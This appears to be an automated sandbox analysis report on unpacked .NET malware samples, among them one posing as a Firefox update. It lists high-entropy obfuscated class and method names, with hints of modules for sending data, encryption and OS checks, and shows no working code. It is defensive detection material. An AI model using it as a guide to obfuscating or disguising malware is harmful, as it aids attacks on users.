Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs	High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs	High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs	High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs	High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, w9w27qdF2JQYXqPwco/VZOv9gq5IfUd0bBp8d.cs	High entropy of concatenated method names: 'V5Q2E013y', 'kt4mB0uWw', '.ctor', 'C0HMwtKM5', 'XqUH4NWxv', 'rB6UBmArX', 'X9Eigl4Sc', 'V7e0LJbOY', 'A7xsgG7rg', 'b92GIxeds'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/WorkerProviders.cs	High entropy of concatenated method names: 'get_CreateParams', '.ctor', 'xEnQCPTGp', 'qkjle11hQ', 'sy6VcdYZO', 'Q9g65IfUd', 'zbBDp8dM9', 'O27NqF2JQ', 'WXqgPwcoj', 'Dispose'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.hWJ3R322hGjdADCEdTABkMzmNQKB5g3ZDFpbuz3Yy5a/UIDemoForm.cs	High entropy of concatenated method names: '.ctor', 'KTljuJuaR6', 'RkXjXddFNe', 'WKZjSoCLDd', 'jmOjBSbeaN', 'VOAjqGjsZw', 'gZ2jd4ByFd', 'qNxjFhc7d1', 'Dispose', 'boXjQyHANe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/VerifierProcedure.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'ObrjiJoLc', 'lv8uRe2tJ', 'Dispose', 'XFhXwyfOy', 'qQhv3gPHlTyBGMPA7C', 'jBiQ8H0NMecLVb4GjD', 'Ud2rHdL23TCMHxAAdY', 'alPPqXAVHncWZJmRYa'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	High entropy of concatenated method names: 'zTLj2wyOwE', 'wdLjmBCi6g', 'Nxbj3BYhiN', 'UGJjR0bft7', 'L4dj8cH9Bh', 'ibtjokU1o6', 'sSUjJK0WUK', 'oO2jANncFP', 'DpejarhlLf', 'a6kjwsShUe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, TB0uWwkXHEufsessia/d4yflyyfO5QE013y6t.cs	High entropy of concatenated method names: 'bw8jvZBu8K', 'AV1jb84K7a', 'XHFj73XccH', 'KcBjWLnQy2', 'E0Lj4rgRtw', 'KTEjn2AngP', '.ctor', '.cctor', 'fyBGBFGnxc7kUHx0e7F', 'OTu8FpGe5tb7MI5D9Ss'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, u9dnx1P24QV72TnMoO/PEX9lCLevoPVSukUXf.cs	High entropy of concatenated method names: '.ctor', 'AECujemKd0', 'MiAuuQuvrg', 'K9EuXOoYCu', 'PffuSK7ef0', 'jFdi8lPLG3egGSpUGGU', 'dcLQP5PAE1aRfl3ke6M', 'C1E8F3PPg0Pq5MQB1D7', 'tafVnxP0WdTkbubQtyQ', 'v0MRITPlHOJMUy5EeEh'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.elBostagi/Sender.cs	High entropy of concatenated method names: '.ctor', 'getResponse', 'Encrypt', 'ISa5GKbXuHU5xU2QCxC', 'UE9PhPbUDCfht4L65of', 'uu5S1kbfwWfPc9rD7Co', 'xlYDmeb9B8nF8ZRR3yg', 'GXtc31bvMCp6V8bXh0M', 'cf66WbbkShSdWRToXAM', 'J967UqbJHlZ65cWVcKi'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, FmYfDRtwHaOeqQio73/K5EQdS5vU2EiwnkmOp.cs	High entropy of concatenated method names: '.ctor', 'j2xXvxrnfM', 'z8yXbPm8gV', 'TWFX7wJf5I', 'QfXXW1douy', 'xB2Do1AEQ2lat4QKbZt', 'ilDIT9A2o6GP11jgbUW', 'uMwGI2AnfHPjKBQHNsC', 'MIfHToAeNMxEpwLRZxs', 'dviBSyAge42GFgK873g'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sTGpkkBje11hQTy6cd/c69XCCSa4y8kcBUEnC.cs	High entropy of concatenated method names: 'juVxjo5ug', 'sel1P3iLK', 'YlkKdHu7s', '.ctor', 'uuoF7bVznqK6AE3DQXh', 'MmglAYVOSb66i5SsOek', 'Rx3RcQV5dlQL0PjrGPw', 'PmYJqpCQhO3VvyEUYn8', 'DJynR5CVlDuIPERQwSk', 'hbZUsVCC1TZGOEKrgDg'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, VYs7xggG7rgj92Ixed/LrXI9ENgl4ScO7eLJb.cs	High entropy of concatenated method names: 'NdhjGHL6VM', 'litjCaDOkA', 'XQOjrsjc0n', 'XSZjhPV6Jt', 'L96j5g3l8r', 'uSTjtkujjH', '.ctor', 'R7nZpdsEy0FfowSHrfY', 'aSHHFws2AURsXPMQCqf', 'gpdVJFsgeFmaxvwciHO'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.FyQn7yEvAKMfXCA2smMK/Cryptor.cs	High entropy of concatenated method names: 'encrypt', 'decrypt', '.ctor', '.cctor', 'G7gRPAstQnksmbaL8k6', 'HNoW6YswUAUGLgya5Y5', 'fsP3C1suEpLFwxXgap9', 'QAZ5jEsNUcMUfN8NG2p', 'vujPXxsMhXW5SIIBjJS', 'BpRo7HspoSQspMuCWbZ'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, OT1UO78FqpHfaj3LJh/eryTP8RVkcWa6d2rXG.cs	High entropy of concatenated method names: 'kL57Ufjj3HtcK', '.ctor', '.cctor', 'gdgIHrdY5PWs5SYjdso', 'SLfp5qdIMhtXf9Hk0Tk', 'J0sa79dKyL2xyJXTfIm', 'aTE94md3RAtS21jrrvS', 'HSTBtBdH5HhgFBMt9uL', 'y8UE3Md40MIyqKIF60M', 'auCyojdxQhvTNWAMX3q'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, P8QpTkVVuVjo5ugPel/HdWG1slNbM1cXiS0LZ.cs	High entropy of concatenated method names: 'nb7eSNXHQ', 'pB1vlhulg', 'dPlbTw64WbOfEZL3qBH', 'Dm38X06xgrGP5s1JnYA', 'jERXFc6YoIQXB8tK5PN', 'GYZuFe6I1MkG2x0LxrJ', 'JbjiIH6Kqh7id8x81vV', 'USJ5a263NBH65i52Jiw', 'nNvXmq6HICu0W4J19Uf', 'RXIKbv6mECX7yxnqJcj'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	High entropy of concatenated method names: '.cctor', 'A0N7UfjY4CN7a', 'XgYS6SdDWo', 'hbvSDWAGnc', 'werSNb84qN', 'dcgSgypVQY', 'VvpSENlVV3', 'fZrSpfthOb', 'S8vSyW8FJb', 'VWVSkB1b5F'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, FKM5IqDU4NWxvLB6Bm/s3iLKf6lkdHu7sr0Hw.cs	High entropy of concatenated method names: '.ctor', 'Ew1bvnMrk', 'IC07fZ5WV', 'WN6W9jlrF', 'TDRDxU6MmhUveb2fJ1K', 'hptLSU6pGwQcQn2MVwj', 'vGryxH6uFZJeaB0WsVD', 'lSq1cQ6NUA8ibK3xfTI', 'hCoDR26TQecQZpG1ng9', 'OOYNTp6yXrMUaNVQdUf'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sNlFPXQyH5NurCceEr/bSZRdrFKIELkMaR5PM.cs	High entropy of concatenated method names: 'U7i9tP4KF', '.ctor', 'E0yQ7766GxOXFpQhimx', 'c39cwa6b2rroanM6w08', 'Y0VoGX6sls0o3NBkvTS', 'vyd8Ho6GHsxvaTGCDBY', 'zylINY6PwGULAt6gnhy', 'nr2B4T60g0H35bHcFG9', 'NC52oJ6LbKvkdMrHbXl', 'gCCuu06AsiRiJj0a1Y2'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, gZ24ByCFdkNxhc7d1j/gVmOSbGeaNOOAGjsZw.cs	High entropy of concatenated method names: 'frIuGPSPiE', 'bnkuCtf3KS', 'T4QurUa5ws', 'FYZuheJvM4', 'yxru5ERIqA', 'OKSutH7wdH', '.ctor', 'kE3h3ULQkLb3vgJym0j', 'TNOdKbLVwXrDB44b28K', 'sHEB6QLCyNgr4xVCWUk'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.tRvRu7Jr5HML52Dh2xdYFfjVXH9w6pvwvL3pHS6q/OSFilter.cs	High entropy of concatenated method names: 'checkwindows', 'Getwindows', 'checkNET', 'GetMaxValue', 'Is32Bits', 'Is64Bits', 'IsWow64Process', 'kLVusis8ZA', 'HKLM_GetString', 'EDmxU30iJ3NZTRt1KSS'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, eYmxboi0HBiRoNSKMI/nwoe9FU0x43IxvZxru.cs	High entropy of concatenated method names: 'KGJuLj7xek', 'EMGuPmjev2', 'vcyuT5fA9O', '.ctor', 'LOtVwtPJOrpsxx1LDZu', 'dsARuaP8lY5pxQDWKbw', 'AOV2spPOGgst6Bf0uJc', 'cDd5Z8PvjWNecAWT92y', 'wTC48HPkprxSEd1Q3Fq', 'PtRXv2P53E1kFOAmtVv'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, J67kXdsdFNeZKZoCLD/K6TiT10kk04NoTlJua.cs	High entropy of concatenated method names: 'm5Guxxa6Ep', 'COuu1J2LEH', '.cctor', 'AcOJVN0I8OEg6dKr9xO', 'JrkqRL0KC3cOM0mGg5Q', 'o9W4x103rESvx4drUvn', 'vSJUiv0x181lXlGcFjY', 'sXw5ie0Ys9pM32lF0pZ', 'IfDLBZ0HTtjvKxJiX2V', 'KjBnkI0mpmEQ6SR0kR9'
